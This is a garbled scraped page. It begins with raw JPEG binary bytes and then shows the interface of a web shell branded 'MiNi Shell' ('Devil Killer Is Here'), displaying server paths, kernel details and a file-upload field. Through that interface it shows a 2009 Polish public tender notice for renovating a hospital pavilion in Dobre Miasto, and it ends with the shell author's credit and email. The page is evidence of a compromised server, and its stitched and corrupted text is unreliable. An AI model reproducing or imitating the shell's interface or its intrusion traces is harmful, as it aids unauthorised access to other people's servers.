JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090810/271714-N-2009.html

<p class="kh_header"><b>Dobre Miasto: przetarg nieograniczony na remont pomieszczeń Pawilonu Diagnostyczno- Terapeutycznego w Zespole Zakładów Opieki Zdrowotnej w Dobrym Mieście</b><br>
<b>Numer ogłoszenia: 271714 - 2009; data zamieszczenia: 10.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Zakładów Opieki Zdrowotnej , ul. Grunwaldzka 10b, 11-040 Dobre Miasto, woj. warmińsko-mazurskie, tel. 089 6151216, 6151225, faks 089 6161216.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.warmia.mazury.pl/powiat_olsztynski</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przetarg nieograniczony na remont pomieszczeń Pawilonu Diagnostyczno- Terapeutycznego w Zespole Zakładów Opieki Zdrowotnej w Dobrym Mieście.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia, jest wykonanie remontu w pomieszczeniach Pawilonu Diagnostyczno 
- Terapeutycznego w Zespole Zakładów Opieki Zdrowotnej w Dobrym Mieście. 
Pomieszczenia przeznaczone do remontu znajdują się na pierwszym piętrze Pawilonu Diagnostyczno  - Terapeutycznego w skrzydle wschodnim (administracja), wraz z klatką schodową, dwoma toaletami dla pracowników administracji i odcinkiem korytarza na parterze od strony  drzwi wejściowych do budynku przy  ul. Grunwaldzkiej do wejścia od strony posesji, oraz oddzielenie ścianą działową części socjalno-administracyjnej na pierwszym piętrze od części medycznej znajdującej  się na parterze.
W zakresie  remontu odcinka korytarza na parterze  przewidziane jest, wydzielenie ścianą działową części socjalno-administracyjnej na pierwszym piętrze od części medycznej znajdującej  
się na parterze. Ściany i sufit należy przygotować do malowania farbą emulsyjną i pomalować. 
Po zakończonych pracach malarskich, należy zamontować nowe lampy oświetleniowe, oraz  zamontować listwy maskujące i schować w nich przewody elektryczne.
W  Korytarzu na pierwszym piętrze wraz ze schodami należy usunąć dwoje drzwi z ościeżnicą w wejściu do części socjalnej i części administracyjnej, zamontować w części administracyjnej drzwi pełne antywłamaniowe o klasie EI30C. Ściany i sufit przygotować do malowania farbą emulsyjną, pomalować. 
Po zakończonych pracach malarskich, należy zamontować nowe lampy oświetleniowe, oraz  zamontować listwy maskujące i schować w nich przewody elektryczne.
W   dwóch łazienkach  na pierwszym piętrze należy zdemontować białą armaturę, usunąć terakotę wraz z glazurą. Na przygotowanym podłożu ułożyć glazurę i terakotę z fugowaniem spoin. Należy podłączyć nowe lampy oświetleniowe, oraz białą armaturę. 
W Holu administracyjnym (korytarz) przewidziane prace polegają na demontażu okna kasowego, wraz z drzwiami i ościeżnicą w wejściu do pomieszczenia kasowego,  montaż nowego okna kasowego antywłamaniowego z PCV, wraz z drzwiami pełnymi antywłamaniowymi, następnym etapem jest malowanie ścian i sufitu  farbą emulsyjną. Po zakończonych pracach malarskich, należy zamontować nowe lampy oświetleniowe.
W pomieszczeniach administracyjnych należy zerwać starą  wykładzinę z tworzywa sztucznego, następnym etapem  jest malowanie ścian i sufitu  farbą emulsyjną. Po zakończonych pracach malarskich, należy zamontować nowe lampy oświetleniowe, położyć nową wykładzinę 
z tworzywa sztucznego, zamontować nowe drzwi w pomieszczeniach biurowych.
W każdym remontowanym pomieszczeniu należy pomalować powierzchnie metalowe 
(tj. kaloryfery, stare ościeżnice i elementy instalacji C.O. )
Wykonawca podczas wizji lokalnej ustali z Zamawiającym: kolor farby, rodzaj lamp oświetleniowych, glazury, terakoty, rodzaj i kolor drzwi i okna kasowego, oraz rodzaj i kolor wykładzin sztucznych określonych w załączonym opisie technicznym. Montaż białej armatury (tj. 2szt:  miski fajansowej 
i umywalki) Wykonawca podłączy z materiałów Zamawiającego.  
2.	Szczegółowy opis przedmiotu zamówienia określa opis techniczny (stanowiący załącznik Nr 3
do SIWZ), przedmiar robót (stanowiący załącznik Nr 2 do SIWZ), rysunki techniczne, obejmujące
pomieszczenia będące przedmiotem remontu (dostępne w wersji papierowej w siedzibie Zamawiającego).
3.	Obowiązkiem wykonawcy jest dokonanie wizji lokalnej i zbadanie miejsca wykonywania robót i jego otoczenia, oraz pozyskanie wszelkich informacji, które mogą być niezbędne w przygotowaniu oferty, 
oraz przy zawieraniu umowy na realizację zamówienia. Koszty takiej wizyty ponosi Wykonawca. 
4.	Przedmiot zamówienia wykonany zostanie zgodnie zasadami i osiągnięciami współczesnej wiedzy technicznej, sztuki budowlanej oraz przepisami prawa budowlanego.
5.	Materiały i urządzenia powinny odpowiadać co do jakości, w szczególności wymaganiom określonym 
w ustawie z dnia 16 kwietnia 2004 roku o wyrobach budowlanych (Dz. U. Nr 92, poz. 881) i innych
obowiązujących przepisach.
6.	Wykonawca udzieli gwarancji i rękojmi na okres 36 miesięcy w pełnym zakresie robót z wyłączeniem
urządzeń, dla których gwarancji udziela producent zgodnie z wystawioną kartą gwarancyjną. Okres
gwarancji i rękojmi liczy się od dnia podpisu protokoluodbioru końcowego robót.
7.   Roboty będą wykonywane w obiekcie czynnym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.40.00.00-1, 45.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą się ubiegać wykonawcy, którzy:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu  z postępowania o udzielenie zmówienia  na podstawie 
art. 24 ust. 1 i 2.
 2. Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą   spełnia - nie
       spełnia , w oparciu o informacje zawarte w dokumentach lub oświadczeniach  
       wyszczególnionych w  dziale IX niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać
       jednoznacznie iż ww warunki wykonawca spełnił. 

       Zamawiający wezwie  wykonawców, którzy w określonym terminie nie złożyli wymaganych przez
       Zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie   warunków udziału 
        w postępowaniu lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego
        oświadczenia i dokumenty zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, , do ich złożenia 
        w wyznaczonym terminie chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu,  albo konieczne
       byłoby unieważnienie postępowania. 

       Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie
       przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty
       budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął
       termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy winni dostarczyć następujące oświadczenia i dokumenty:

1. Na potwierdzenie posiadanych uprawnień do wykonywania określonej działalności
      Wykonawca winien dostarczyć następujące dokumenty:
a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
      działalności gospodarczej potwierdzające, że Wykonawca prowadzi działalność będącą przedmiotem
      zamówienia jeżeli odrębne przepisy wymagają wpisu do rejestru lub
      zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 
      6 miesięcy przed upływem terminu składania ofert;
b)   Oświadczenie, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie
       zdrowotne i społeczne. W przypadku gdy Wykonawca zalega z płatnościami w ZUS,
       Urzędzie Skarbowym lub Kasy Rolniczego Ubezpieczenia Społecznego  - zaświadczenie wystawione przez 
       w/w organy, że uzyskał przewidziane prawem zwolnienie, odroczeni lub rozłożenie na raty zaległych
       płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej 
       niż 3 miesiące przed upływem terminu składania ofert.

2.	Na potwierdzenie warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, Wykonawca dostarczy: 
1.	wykaz co najmniej 3 wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie,
2.	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą  uczestniczyć 
w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia,  a także zakresu wykonywanych przez nie czynności lub oświadczenie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli wykonawca wskazał osoby, którymi będzie dysponował.
3.	dokumenty stwierdzające, że kierownik robót, posiada wymagane uprawnienia tj. kserokopie uprawnień budowlanych oraz aktualne zaświadczenie z właściwej izby samorządu zawodowego potwierdzające przynależność do izby.
4.	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi  dysponuje lub będzie dysponował wykonawca lub oświadczenie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli wykonawca wskaże narzędzia i urządzenia, którymi będzie dysponował.

3.  Na potwierdzenie sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
       Wykonawca dostarczy:
        Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony
        od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

4.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
       Polskiej, zamiast dokumentu wymienionego w pkt. 1a i 1b niniejszego działu składa dokument 
       wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający
       odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Dokumenty, o których mowa w pkt. 4 ppkt. 1) i 3) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument, o którym mowa w pkt. 4 ppkt. 2) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

5.   Wypełniony formularz Oferta - Załącznik Nr 1 do SIWZ.

6. Opracowany kosztorys.

7.  Oświadczenie o spełnieniu art. 22 ust.1 ustawy Prawo Zamówień publicznych i nie podleganiu
      wykluczeniu z art. 24 ustawy - zał. Nr 8 do SIWZ.

8.    Zaparafowany wzór umowy - załącznik Nr 4 do SIWZ.

9.   Wykaz co najmniej 3 wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem
       wszczęcia postępowania  o udzielenie zamówienia - załącznik Nr 5 do SIWZ.

10. Wykaz osób, które po stronie wykonawcy będą wykonywać zamówienie, wraz z dokumentami, 
       o których mowa w Rozdziale X pkt. 2 ppkt. 3 -Załącznik Nr 6 do SIWZ

11. Jeżeli Wykonawca przewiduje udzielenie zlecenia podwykonawcom należy załączyć dane
        podwykonawców - Załącznik Nr 7 do SIWZ.	

Dokumenty muszą być przedstawione w formie oryginału lub kserokopii poświadczonej 
za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną. W przypadku podpisania
oferty lub poświadczenia kopii dokumentu za zgodność z oryginałem przez osobę 
nie wymienioną w dokumencie dopuszczającym do obrotu ( np. odpis KRS), należy dołączyć
oryginał pełnomocnictwa.
Wykonawca nie może samodzielnie zmieniać treści formularza oferty. Należy wypełnić
wszystkie miejsca pozostawione do uzupełnienia przez dokonanie odpowiednich wpisów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_olsztynski.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Zakładów Opieki Zdrowotnej w Dobrym Mieście 
             11-040 Dobre Miasto 
             ul. Grunwaldzka 10 B.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2009 godzina 12:00, miejsce: Sekretariat Zespołu Zakładów Opieki Zdrowotnej w Dobrym Mieście 
             11-040 Dobre Miasto 
             ul. Grunwaldzka 10 B.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com